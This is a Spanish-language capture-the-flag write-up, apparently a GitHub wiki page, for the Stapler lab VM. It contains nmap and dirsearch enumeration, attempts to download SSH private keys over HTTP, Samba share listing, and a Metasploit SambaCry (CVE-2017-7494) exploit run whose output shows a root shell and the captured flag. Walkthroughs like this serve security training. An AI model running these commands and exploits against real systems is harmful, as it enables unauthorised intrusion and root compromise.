stapler - danielcastropalomares/security GitHub Wiki
Con un primer escaneo vemos los siguiente puertos abiertos:
Nmap scan report for 172.31.255.113
Host is up (0.0013s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp closed doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 08:00:27:87:25:4C (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -A 172.31.255.113
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-27 16:47 CET
Nmap scan report for 172.31.255.113
Host is up (0.00059s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.31.255.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase, ODBCClient, FoundRows, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x7F\x7F\x14l}ds~nzx'\x0BZ\x13t[\x18%>
|_ Auth Plugin Name: 88
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/27%Time=5C24F408%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x
SF:152\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x
SF:04\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\x
SF:a2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2
SF:\x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\
SF:xb2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xae
SF:u\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\x
SF:d3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\x
SF:a0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\
SF:x87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\
SF:xf4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\
SF:xdc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\x
SF:d5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\x
SF:af\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2
SF::\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk
SF:\x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc
SF:\xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xf
SF:d\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc
SF:\x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0
SF:\xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r
SF:\xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaa
SF:k\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy
SF:\xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7
SF:f\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb
SF:\[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\
SF:xcc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\x
SF:a7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81
SF:\xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x
SF:96\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8
SF:f\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf
SF:4\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd
SF:\x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\x
SF:bcL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf
SF:0\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04
SF:\xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\
SF:xf3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11
SF:\?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:87:25:4C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m58s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2018-12-27T16:47:33+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-12-27 17:47:33
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 172.31.255.113
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.78 seconds
Parece que el servicio DNS está configurado como DNS forwader:
root@kali:~# host google.es 172.31.255.113
Using domain server:
Name: 172.31.255.113
Address: 172.31.255.113#53
Aliases:
google.es has address 172.217.16.227
google.es has IPv6 address 2a00:1450:4003:803::2003
google.es mail is handled by 10 aspmx.l.google.com.
google.es mail is handled by 30 alt2.aspmx.l.google.com.
google.es mail is handled by 40 alt3.aspmx.l.google.com.
google.es mail is handled by 20 alt1.aspmx.l.google.com.
google.es mail is handled by 50 alt4.aspmx.l.google.com.
Lanzamos un ataque de diccionario para listar los directorios del puerto 80:
[*] Execute: /usr/local/src/Osmedeus/plugins/dirsearch/dirsearch.py --plain-text-report=/usr/local/src/Osmedeus/workspaces/172.31.255.113/directory/172.31.255.113-dirsearch.txt -u "http://172.31.255.113" -e php,asp,aspx,jsp,js -t 20
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js | Threads: 20 | Wordlist size: 7489
Error Log: /usr/local/src/Osmedeus/plugins/dirsearch/logs/errors-18-12-27_17-12-08.log
Target: http://172.31.255.113
[17:12:08] Starting:
[17:12:08] 200 - 220B - /.bash_logout
[17:12:08] 200 - 4KB - /.bashrc
[17:12:08] 200 - 4KB - /.bashrc/
[17:12:09] 200 - 675B - /.profile
Intento descargarme las key ssh sin exito:
root@kali:/tmp/stapler# wget http://172.31.255.113/.ssh/id_rsa
--2018-12-27 17:16:31-- http://172.31.255.113/.ssh/id_rsa
Connecting to 172.31.255.113:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-12-27 17:16:31 ERROR 404: Not Found.
root@kali:/tmp/stapler# wget http://172.31.255.113/.ssh/id_rsa.pub
--2018-12-27 17:16:39-- http://172.31.255.113/.ssh/id_rsa.pub
Connecting to 172.31.255.113:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-12-27 17:16:39 ERROR 404: Not Found.
A nivel de samba vemos que hay diferentes carpetas, en la carpeta /tmp podemos escribir:
root@kali:/tmp/stapler# smbclient -L 172.31.255.113
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Dentro de la carpeta kathy encontramos lo siguiente:
smb://172.31.255.113/kathy/backup
vsftpd.conf -> se encuentran restringuidos los usuarios con un user list y el usuario anonymous esta habilitado pero sin escritura.
wordpress-4.tar.gz -> parece que no hay ninguna config interesante.
todo-list: I'm making sure to backup anything important for Initech, Kathy
Como el servidor samba remoto se puede acceder con el usuarios anonymous y podemos escribir en el directorio /tmp, vamos a probar de lanzar el exploit SambaCry:
Samba in 4.5.9 version and before that is vulnerable to a remote code execution vulnerability named SambaCry. CVE-2017-7494
La versión de la víctima es la siguiente:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
msf > use exploit/linux/samba/is_known_pipename
msf exploit(linux/samba/is_known_pipename) > set RHOST 172.31.255.113
msf exploit(linux/samba/is_known_pipename) > set RPORT 139
msf exploit(linux/samba/is_known_pipename) > exploit
[*] 172.31.255.113:139 - Using location \\172.31.255.113\tmp\ for the path
[*] 172.31.255.113:139 - Retrieving the remote path of the share 'tmp'
[*] 172.31.255.113:139 - Share 'tmp' has server-side path '/var/tmp
[*] 172.31.255.113:139 - Uploaded payload to \\172.31.255.113\tmp\LaUspOSy.so
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/LaUspOSy.so using \\PIPE\/var/tmp/LaUspOSy.so...
[-] 172.31.255.113:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/LaUspOSy.so using /var/tmp/LaUspOSy.so...
[-] 172.31.255.113:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.31.255.113:139 - Uploaded payload to \\172.31.255.113\tmp\nEmUkSQQ.so
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/nEmUkSQQ.so using \\PIPE\/var/tmp/nEmUkSQQ.so...
[-] 172.31.255.113:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/nEmUkSQQ.so using /var/tmp/nEmUkSQQ.so...
[+] 172.31.255.113:139 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (172.31.255.129:36701 -> 172.31.255.113:139) at 2018-12-28 13:16:14 +0100
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
root@red:/tmp#
Ya podemos leer la bandera:
root@red:/root# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b